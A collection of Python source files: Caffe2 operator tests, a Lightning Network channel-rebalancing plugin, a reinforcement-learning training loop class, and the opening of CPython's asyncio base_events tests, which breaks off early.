should_stop_blob=core.BlobReference('should_stop_1')),
core.execution_step(
'step_2', nets[1],
should_stop_blob=core.BlobReference('should_stop_2')),
core.execution_step('step_3', nets[2])
]
expected = [1.0, 0.0, 1.0]
plan = core.Plan('plan')
plan.AddStep(core.execution_step('all_steps', steps, num_iter=3))
self.ws.run(plan)
for i, _ in enumerate(nets):
self.assertEqual(
self.ws.blobs['output_{}'.format(i + 1)].fetch()[0],
expected[i])
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100))
def test_iter_count_with_execution_step(self, initial_iters, num_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
step = core.ExecutionStep("step", [net])
step.SetIter(num_iters)
plan = core.Plan("plan")
plan.AddStep(step)
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters)
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100),
num_nets=st.integers(0, 5))
def test_atomic_iter_with_concurrent_steps(self, initial_iters, num_iters,
num_nets):
init_net = core.Net("init_net")
iter_mutex = init_net.CreateMutex([], ["iter_mutex"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
concurrent_steps = core.ExecutionStep("concurrent_steps",
num_iter=num_iters)
for i in range(num_nets):
net = core.Net("net_{}".format(i))
net.AtomicIter([iter_mutex, "iter"], ["iter"])
step = core.ExecutionStep("step", [net])
concurrent_steps.AddSubstep(step)
concurrent_steps.SetConcurrentSubsteps(True)
plan = core.Plan("plan")
plan.AddStep(concurrent_steps)
self.ws.run(init_net)
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters * num_nets)
@given(a=hu.tensor(),
src=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
dst=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
use_name=st.booleans(),
**hu.gcs)
def test_cast(self, a, src, dst, use_name, gc, dc):
a = a.astype(src)
# Casting from a float type outside the range of the integral
# type is UB.
ftypes = [np.float32, np.float64]
if src in ftypes and dst not in ftypes and dst is not np.bool:
info = np.iinfo(dst)
a = np.clip(a, info.min, info.max)
def ref(data):
return [data.astype(dst)]
to = _NUMPY_TYPE_TO_ENUM[dst]
if use_name:
to = TensorProto.DataType.Name(to).lower()
op = core.CreateOperator('Cast', ["X"], ["Y"], to=to)
self.assertDeviceChecks(dc, op, [a], [0])
out, = self.assertReferenceChecks(gc, op, [a], ref)
self.assertEqual(dst, out.dtype)
@given(a=hu.tensor(),
eps=st.floats(min_value=1e-4, max_value=1e-2),
**hu.gcs_cpu_only)
def test_logit(self, a, eps, gc, dc):
def ref(data):
data = np.clip(data, eps, 1.0 - eps)
return (np.log(data / (1 - data)), )
op = core.CreateOperator('Logit', ["X"], ["Y"], eps=eps)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
@given(a=hu.tensor(elements=st.floats(allow_nan=True)),
value=st.floats(min_value=-10, max_value=10),
**hu.gcs_cpu_only)
def test_replace_nan(self, a, value, gc, dc):
def ref(data):
out = np.copy(data)
out[np.isnan(data)] = value
return (out, )
op = core.CreateOperator('ReplaceNaN', ["X"], ["Y"], value=value)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
@given(data=_dtypes(dtypes=[np.int32, np.int64, np.float32, np.bool]).
flatmap(lambda dtype: hu.tensor(
min_dim=1, dtype=dtype, elements=hu.elements_of_type(dtype))),
has_input=st.booleans(),
has_extra_shape=st.booleans(),
extra_shape=st.lists(
min_size=1, max_size=5, elements=st.integers(1, 5)),
**hu.gcs)
def test_constant_fill(self, data, has_input, has_extra_shape, extra_shape,
gc, dc):
dtype = data.dtype.type
# in opt mode, np.bool is converted into np.bool_
if data.dtype == np.dtype(np.bool):
dtype = np.bool
value = data.item(0)
gt_shape = data.shape
inputs = [data]
enum_type = _NUMPY_TYPE_TO_ENUM[dtype]
if has_input:
if has_extra_shape:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
extra_shape=extra_shape,
value=value)
gt_shape += tuple(extra_shape)
else:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
value=value)
else:
op = core.CreateOperator('ConstantFill', [], ["Y"],
dtype=enum_type,
value=value,
shape=list(gt_shape))
inputs = []
def ref(inputs=None):
outputs = np.full(shape=gt_shape, fill_value=value, dtype=dtype)
return [outputs]
self.assertDeviceChecks(dc, op, inputs, [0])
out, = self.assertReferenceChecks(gc, op, inputs, ref)
self.assertEqual(dtype, out.dtype)
@given(t=st.integers(1, 5),
n=st.integers(1, 5),
d=st.integers(1, 5))
def test_elman_recurrent_network(self, t, n, d):
from caffe2.python import model_helper, brew
np.random.seed(1701)
step_net = model_helper.ModelHelper(name="Elman")
# TODO: name scope external inputs and outputs
step_net.Proto().external_input.extend(
["input_t", "seq_lengths", "timestep",
"hidden_t_prev", "gates_t_w", "gates_t_b"])
step_net.Proto().type = "simple"
step_net.Proto().external_output.extend(["hidden_t", "gates_t"])
brew.fc(step_net,
"hidden_t_prev", "gates_t", dim_in=d, dim_out=d, axis=2)
step_net.net.Sum(["gates_t", "input_t"], ["gates_t"])
step_net.net.Sigmoid(["gates_t"], ["hidden_t"])
# Initialize params for step net in the parent net
for op in step_net.param_init_net.Proto().op:
workspace.RunOperatorOnce(op)
backward_ops, backward_mapping = core.GradientRegistry.GetBackwardPass(
step_net.Proto().op, {"hidden_t": "hidden_t_grad"})
backward_mapping = {
str(k): str(v) for k, v in viewitems(backward_mapping)
}
backward_step_net = core.Net("ElmanBackward")
del backward_step_net.Proto().op[:]
backward_step_net.Proto().op.extend(backward_ops)
assert backward_mapping["input_t"] == "gates_t_grad"
links = [
("hidden_t_prev", "hidden", 0),
("hidden_t", "hidden", 1),
("input_t", "input", 0),
]
link_internal, link_external, link_offset = zip(*links)
backward_links = [
("hidden_t_prev_grad", "hidden_grad", 0),
("hidden_t_grad", "hidden_grad", 1),
("gates_t_grad", "input_grad", 0),
]
backward_link_internal, backward_link_external, backward_link_offset = \
zip(*backward_links)
backward_step_net.Proto().external_input.extend(["hidden_t_grad"])
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_input)
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_output)
inputs = ["input", "seq_lengths", "gates_t_w", "gates_t_b", "hidden_input"]
recurrent_inputs = ["hidden_input"]
op = core.CreateOperator(
"RecurrentNetwork",
inputs,
["output", "hidden", "hidden_output", "step_workspaces"],
alias_src=["hidden", "hidden"],
alias_dst=["output", "hidden_output"],
alias_offset=[1, -1],
recurrent_states=["hidden"],
initial_recurrent_state_ids=[
inputs.index(i) for i in recurrent_inputs
],
link_internal=link_internal,
link_external=link_external,
link_offset=link_offset,
backward_link_internal=backward_link_internal,
backward_link_external=backward_link_external,
backward_link_offset=backward_link_offset,
param=[inputs.index(p) for p in step_net.params],
step_net=str(step_net.Proto()),
backward_step_net=str(backward_step_net.Proto()),
outputs_with_grads=[0],
)
workspace.FeedBlob(
"input", np.random.randn(t, n, d).astype(np.float32))
workspace.FeedBlob(
"hidden_input", np.random.randn(1, n, d).astype(np.float32))
workspace.FeedBlob(
"seq_lengths", np.random.randint(0, t, size=(n,)).astype(np.int32))
def reference(input, seq_lengths, gates_w, gates_b, hidden_input):
T = input.shape[0]
N = input.shape[1]
D = input.shape[2]
hidden = np.zeros(shape=(T + 1, N, D))
assert hidden.shape[0] == T + 1
assert hidden.shape[1] == N
assert hidden.shape[2] == D
hidden[0, :, :] = hidden_input
for t in range(T):
input_t = input[t].reshape(1, N, D)
hidden_t_prev = hidden[t].reshape(1, N, D)
gates = np.dot(hidden_t_prev, gates_w.T)
gates = gates.reshape(1, N, D) + input_t.reshape(1, N, D)
hidden[t + 1] = sigmoid(gates)
return hidden[1:], hidden, hidden[-1].reshape(1, N, D)
self.assertReferenceChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
reference,
outputs_to_check=[0, 1, 2])
for param in [0, 2, 3]:
self.assertGradientChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
param,
[0])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_space_to_batch(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(n, c, h, w).astype(np.float32)
op = core.CreateOperator("SpaceToBatch", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_batch_to_space(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(
n * block_size * block_size,
c,
(h + 2 * pad) // block_size,
(w + 2 * pad) // block_size).astype(np.float32)
op = core.CreateOperator("BatchToSpace", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(),
in_place=st.booleans(),
scale=st.floats(min_value=-2.0, max_value=2.0),
**hu.gcs)
def test_scale(self, X, in_place, scale, gc, dc):
op = core.CreateOperator(
"Scale", ["X"], ["Y" if not in_place else "X"],
scale=scale)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(s=st.text())
def test_string_serde(self, s):
s = s.encode('ascii', 'ignore')
self.ws.create_blob("a").feed(s)
serialized = self.ws.blobs["a"].serialize("a")
self.ws.create_blob("b").deserialize(serialized)
self.assertEqual(s, self.ws.blobs[("a")].fetch())
self.assertEqual(s, self.ws.blobs[("b")].fetch())
@given(pad=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_same_pad_image(self, pad, size, input_channels, batch_size, order,
mode, gc, dc):
assume(size > pad)
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad=pad,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad, pad), (pad, pad), (0, 0)), mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(pad_t=st.integers(0, 3),
pad_l=st.integers(0, 3),
pad_b=st.integers(0, 3),
pad_r=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_pad_image(self, pad_t, pad_l, pad_b, pad_r, size, input_channels,
batch_size, order, mode, gc, dc):
assume(size > max(pad_b, pad_r, pad_t, pad_l))
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad_t=pad_t,
pad_l=pad_l,
pad_b=pad_b,
pad_r=pad_r,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad_t, pad_b), (pad_l, pad_r), (0, 0)),
mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad_t, pad_b), (pad_l, pad_r)),
mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(size=st.integers(7, 10),
input_channels=st.integers(1, 10),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW", "NHWC"]),
epsilon=st.floats(min_value=1e-4, max_value=1e-2),
**hu.gcs_cpu_only)
def test_instance_norm(self, size, input_channels, batch_size, order,
epsilon, gc, dc):
op = core.CreateOperator(
"InstanceNorm",
["X", "scale", "bias"],
["Y"],
order=order,
epsilon=epsilon,
)
np.random.seed(1701)
scale = np.random.rand(input_channels).astype(np.float32) + 0.5
bias = np.random.rand(input_channels).astype(np.float32) - 0.5
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
if order == "NHWC":
X = X.swapaxes(1, 2).swapaxes(2, 3)
def ref_nchw(x, scale, bias):
x = x.reshape(batch_size * input_channels, size * size)
y = (x - x.mean(1)[:, np.newaxis])
y /= np.sqrt(x.var(1) + epsilon)[:, np.newaxis]
y = y.reshape(batch_size, input_channels, size, size)
y = y * scale.reshape(1, input_channels, 1, 1)
y = y + bias.reshape(1, input_channels, 1, 1)
return (y, )
def ref_nhwc(x, scale, bias):
x = x.swapaxes(2, 3).swapaxes(1, 2)
y = ref_nchw(x, scale, bias)[0]
return (y.swapaxes(1, 2).swapaxes(2, 3), )
self.assertReferenceChecks(
gc, op, [X, scale, bias],
ref_nchw if order == "NCHW" else ref_nhwc)
# TODO(jiayq): when there are backward and GPU implementations, enable
# these two.
# self.assertDeviceChecks(dc, op, [X, scale, bias], [0])
# self.assertGradientChecks(gc, op, [X, scale, bias], 0, [0])
ws = workspace.C.Workspace()
feeds = [("X", X), ("scale", scale), ("bias", bias)]
for blob, arr in feeds:
ws.create_blob(blob).feed(arr)
for _ in range(100):
ws.run(op)
for blob, arr in feeds:
np.testing.assert_array_equal(ws.blobs[blob].fetch(), arr)
@given(sizes=st.lists(st.integers(1, 100), min_size=1),
in_place=st.booleans(),
**hu.gcs)
def test_unsafe_coalesce(self, sizes, in_place, gc, dc):
gAlignment = 32
Xs = [np.random.randn(size)
.astype(np.random.choice([np.float32, np.float64, np.uint8]))
for size in sizes]
op = core.CreateOperator(
"UnsafeCoalesce",
["X_{}".format(i) for i, _ in enumerate(sizes)],
[("X_{}" if in_place else "Y_{}").format(i)
for i, _ in enumerate(sizes)] + ["coalesced"])
self.assertDeviceChecks(dc, op, Xs, list(range(len(sizes) + 1)))
def unsafe_coalesce(*xs):
def to_uint8(x):
x_aligned_bytes = ((x.nbytes + gAlignment - 1) // gAlignment) \
* gAlignment
x_aligned = np.zeros(
shape=(x_aligned_bytes // x.dtype.itemsize, ),
dtype=x.dtype)
x_aligned[:x.size] = x
x_cast = np.fromstring(x_aligned.tobytes(), dtype='<u1')
return x_cast
flat = [to_uint8(x) for x in xs]
coalesced = np.concatenate(flat)
return list(xs) + [coalesced]
self.assertReferenceChecks(gc, op, Xs, unsafe_coalesce)
@given(inp=_dtypes().flatmap(lambda dt: _tensor_and_indices(
elements=st.floats(min_value=0, max_value=1), dtype=dt)),
**hu.gcs)
def test_sparse_to_dense(self, inp, gc, dc):
first_dim, X, I = inp
if X.dtype != np.dtype('float32') and gc.device_type == 1:
# Cuda only support 32 bit float
print("Bailout {}".format(X.dtype))
return
if gc.device_type == 1:
# Cuda version only support int32
I = I.astype(np.int32)
# values don't matter
D = np.zeros((first_dim,) + X.shape[1:]).astype(X.dtype)
op = core.CreateOperator("SparseToDense", ["I", "X", "D"], ["Y"])
def sparse_to_dense(I, X, D):
O = np.zeros(D.shape)
for i, p in enumerate(I):
O[p] += X[i]
return [O]
self.assertReferenceChecks(gc, op, [I, X, D], sparse_to_dense)
X = X.astype(np.float32)
self.assertGradientChecks(gc, op, [I, X, D], 1, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_dot_product(self, inputs, gc, dc):
X, Y = inputs
op = core.CreateOperator("DotProduct", ["X", "Y"], 'out')
def dotproduct(X, Y):
return (np.sum(X * Y, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
K=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_padding(self, N, M, K, pad_value, gc, dc):
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
pad_value=pad_value)
def dotproduct(X, Y):
Z = np.ones((N, max(M, K))).astype(np.float32) * pad_value
if M < K:
Z[:, :M] = X
return (np.sum(Z * Y, axis=1), )
else:
Z[:, :K] = Y
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_rep_padding(self, N, M, pad_value, gc, dc):
K = 2 * M
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
replicate=True,
pad_value=pad_value)
def dotproduct(X, Y):
import numpy.matlib as npm
if M < K:
Z = npm.repmat(X, 1, K // M)
return (np.sum(Z * Y, axis=1), )
else:
Z = npm.repmat(Y, 1, M // K)
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10), **hu.gcs_cpu_only)
def test_ensure_dense(self, N, M, gc, dc):
# in place
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "X")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
# or not
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "out")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
@given(N=st.integers(min_value=10, max_value=100),
M=st.integers(min_value=2, max_value=10),
num_buckets=st.integers(min_value=1, max_value=5),
**hu.gcs_cpu_only)
def test_accumulate_histogram_op(self, N, M, num_buckets, gc, dc):
X = np.random.rand(N, M).astype(np.float32)
lower_bound, upper_bound = 0.1, 0.9
op = core.CreateOperator("AccumulateHistogram", ["X"],
['cur_hist', 'acc_hist'],
lower_bound=lower_bound,
upper_bound=upper_bound,
num_buckets=num_buckets)
def histogram(X):
hist = np.zeros((num_buckets + 2, ), dtype=np.int32)
segment = (upper_bound - lower_bound) / num_buckets
Y = np.zeros((N, M), dtype=np.int32)
Y[X < lower_bound] = 0
Y[X >= upper_bound] = num_buckets + 1
Y[(X >= lower_bound) & (X < upper_bound)] = \
((X[(X >= lower_bound) & (X < upper_bound)] - lower_bound) /
segment + 1).astype(np.int32)
for i in range(Y.shape[0]):
for j in range(Y.shape[1]):
hist[Y[i][j]] += 1
cur_hist, acc_hist = hist, hist
return [cur_hist, acc_hist]
self.assertDeviceChecks(dc, op, [X], [0, 1])
self.assertReferenceChecks(gc, op, [X], histogram)
if __name__ == "__main__":
unittest.main()
|
jitrebalance.py
|
#!/usr/bin/env python3
from math import ceil
from pyln.client import Plugin, Millisatoshi, RpcError
import binascii
import hashlib
import secrets
import threading
import time
plugin = Plugin()
def get_reverse_chan(scid, chan):
for c in plugin.rpc.listchannels(scid)['channels']:
if c['channel_flags'] != chan['direction']:
return c
return None
def get_circular_route(scid, chan, amt, peer, exclusions, request):
"""Compute a circular route with `scid` as last leg.
"""
# Compute the last leg of the route first, so we know the parameters to
# traverse that last edge.
reverse_chan = get_reverse_chan(scid, chan)
if reverse_chan is None:
plugin.log("Could not compute parameters for the last hop")
return None
last_amt = ceil(float(amt) +
float(amt) * reverse_chan['fee_per_millionth'] / 10**6 +
reverse_chan['base_fee_millisatoshi'])
last_cltv = 9 + reverse_chan['delay']
try:
route = plugin.rpc.getroute(
node_id=peer['id'],
msatoshi=last_amt,
riskfactor=1,
exclude=exclusions,
cltv=last_cltv,
)['route']
# Append the last hop we computed manually above
route += [{
'id': plugin.node_id,
'channel': scid,
'direction': chan['direction'],
'msatoshi': amt,
'amount_msat': '{}msat'.format(amt),
'delay': 9
}]
return route
except RpcError:
plugin.log("Could not get a route, no remaining one? Exclusions : {}"
.format(exclusions))
return None
def try_rebalance(scid, chan, amt, peer, request):
# Exclude the channel we are trying to rebalance when searching for a
# path. We will manually append it to the route and bump the other
# parameters so it can be used afterwards
exclusions = [
"{scid}/{direction}".format(scid=scid, direction=chan['direction'])
]
# Try as many routes as possible before the timeout expires
stop_time = int(time.time()) + plugin.rebalance_timeout
while int(time.time()) <= stop_time:
route = get_circular_route(scid, chan, amt, peer, exclusions, request)
# We exhausted all the possibilities, Game Over
if route is None:
request.set_result({"result": "continue"})
return
# We're about to initiate a rebalancing, we'd better remember how we can
# settle it once we see it back here.
payment_key = secrets.token_bytes(32)
payment_hash = hashlib.sha256(payment_key).hexdigest()
plugin.rebalances[payment_hash] = {
"payment_key": binascii.hexlify(payment_key).decode('ASCII'),
"payment_hash": payment_hash,
"request": request,
}
# After all this work we're finally in a position to judge whether a
# rebalancing is worth it at all. The rebalancing is considered worth it
# if the fees we're about to pay are less than or equal to the fees we get
# out of forwarding the payment.
plugin.log("Sending rebalance request using payment_hash={}, route={}".format(
payment_hash, route
))
try:
plugin.rpc.sendpay(route, payment_hash)
# If the attempt is successful, we acknowledged it on the
# receiving end (a couple of line above), so we leave it dangling
# here.
if (plugin.rpc.waitsendpay(payment_hash).get("status")
== "complete"):
plugin.log("Succesfully re-filled outgoing capacity in {},"
"payment_hash={}".format(scid, payment_hash))
return
except RpcError as e:
error = e.error['data']
# The erring_channel field can not be present (shouldn't happen) or
# can be "0x0x0"
erring_channel = error.get('erring_channel', '0x0x0')
if erring_channel != '0x0x0':
if erring_channel == scid:
break
erring_direction = error['erring_direction']
exclusions.append("{}/{}".format(erring_channel,
erring_direction))
plugin.log("Excluding {} due to a failed attempt"
.format(erring_channel))
plugin.log("Timed out while trying to rebalance")
request.set_result({"result": "continue"})
def get_peer_and_channel(peers, scid):
"""Look for the channel identified by {scid} in our list of {peers}"""
for peer in peers:
for channel in peer["channels"]:
if channel.get("short_channel_id") == scid:
return (peer, channel)
return (None, None)
@plugin.async_hook("htlc_accepted")
def on_htlc_accepted(htlc, onion, plugin, request, **kwargs):
plugin.log("Got an incoming HTLC htlc={}".format(htlc))
# The HTLC might be a rebalance we ourselves initiated, better check
# against the list of pending ones.
rebalance = plugin.rebalances.get(htlc['payment_hash'], None)
if rebalance is not None:
# Settle the rebalance, before settling the request that initiated the
# rebalance.
request.set_result({
"result": "resolve",
"payment_key": rebalance['payment_key']
})
# Now wait for it to settle correctly
plugin.rpc.waitsendpay(htlc['payment_hash'])
rebalance['request'].set_result({"result": "continue"})
# Clean up our stash of active rebalancings.
del plugin.rebalances[htlc['payment_hash']]
return
# Check to see if the next channel has sufficient capacity
scid = onion['short_channel_id'] if 'short_channel_id' in onion else '0x0x0'
# Are we the destination? Then there's nothing to do. Continue.
if scid == '0x0x0':
request.set_result({"result": "continue"})
return
# Locate the channel + direction that would be the next in the path
peers = plugin.rpc.listpeers()['peers']
peer, chan = get_peer_and_channel(peers, scid)
if peer is None or chan is None:
return
# Check if the channel is active and routable, otherwise there's little
# point in even trying
if not peer['connected'] or chan['state'] != "CHANNELD_NORMAL":
request.set_result({"result": "continue"})
return
# Need to consider who the funder is, since they are paying the fees.
# TODO If we are the funder we need to take the cost of an HTLC into
# account as well.
# funder = chan['msatoshi_to_us_max'] == chan['msatoshi_total']
forward_amt = Millisatoshi(onion['forward_amount'])
# If we have enough capacity just let it through now. Otherwise the
# Millisatoshi raises an error for negative amounts in the calculation
# below.
if forward_amt < chan['spendable_msat']:
request.set_result({"result": "continue"})
return
# Compute the amount we need to rebalance, give us a bit of breathing room
# while we're at it (25% more rebalancing than strictly necessary) so we
# don't end up with a completely unbalanced channel right away again, and
# to account for a bit of fuzziness when it comes to dipping into the
# reserve.
amt = ceil(int(forward_amt - chan['spendable_msat']) * 1.25)
# If we have a higher balance than is required we don't need to rebalance,
# just stop here.
if amt <= 0:
request.set_result({"result": "continue"})
return
t = threading.Thread(target=try_rebalance, args=(scid, chan, amt, peer, request))
t.daemon = True
t.start()
@plugin.init()
def init(options, configuration, plugin):
plugin.log("jitrebalance.py initializing {}".format(configuration))
plugin.node_id = plugin.rpc.getinfo()['id']
# FIXME: this int() shouldn't be needed: check if this is pyln's or
# lightningd's fault.
plugin.rebalance_timeout = int(options.get("jitrebalance-try-timeout"))
# Set of currently active rebalancings, keyed by their payment_hash
plugin.rebalances = {}
plugin.add_option(
"jitrebalance-try-timeout",
60,
"Number of seconds before we stop trying to rebalance a channel.",
opt_type="int"
)
plugin.run()
|
single_process.py
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from ..args_provider import ArgsProvider
import tqdm
class SingleProcessRun:
def __init__(self):
''' Initialization for SingleProcessRun. Accepted arguments:
``num_minibatch``,
``num_episode``,
``tqdm``
'''
self.args = ArgsProvider(
call_from = self,
define_args = [
("num_minibatch", 5000),
("num_episode", 10000),
("tqdm", dict(action="store_true")),
]
)
def setup(self, GC, episode_start=None, episode_summary=None):
''' Setup for SingleProcessRun.
Args:
GC(`GameContext`): Game Context
episode_start(func): operations to perform before each episode
episode_summary(func): operations to summarize after each epidsode
'''
self.GC = GC
self.episode_summary = episode_summary
self.episode_start = episode_start
def run(self):
''' Main training loop. Initialize Game Context and looping the required episodes.
Call episode_start and episode_summary before and after each episode if necessary.
Visualize with a progress bar if ``tqdm`` is set.
Print training stats after each episode.
In the end, print summary for game context and stop it.
'''
self.GC.Start()
args = self.args
for k in range(args.num_episode):
if self.episode_start is not None:
self.episode_start(k)
if args.tqdm: iterator = tqdm.trange(args.num_minibatch, ncols=50)
else: iterator = range(args.num_minibatch)
for i in iterator:
# import pdb
# pdb.set_trace()
self.GC.Run()
if self.episode_summary is not None:
self.episode_summary(k)
self.GC.PrintSummary()
self.GC.Stop()
def run_multithread(self):
''' Start training in a multithreaded environment '''
def train_thread():
args = self.args
for i in range(args.num_episode):
for k in range(args.num_minibatch):
if self.episode_start is not None:
self.episode_start(k)
if k % 500 == 0:
print("Receive minibatch %d/%d" % (k, args.num_minibatch))
self.GC.RunGroup("train")
# Print something.
self.episode_summary(i)
def actor_thread():
while True:
self.GC.RunGroup("actor")
self.GC.Start()
# Start the two threads.
train_th = threading.Thread(target=train_thread)
actor_th = threading.Thread(target=actor_thread)
train_th.start()
actor_th.start()
train_th.join()
actor_th.join()
|
test_base_events.py
|
"""Tests for base_events.py"""
import errno
import logging
import math
import os
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from asyncio import events
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
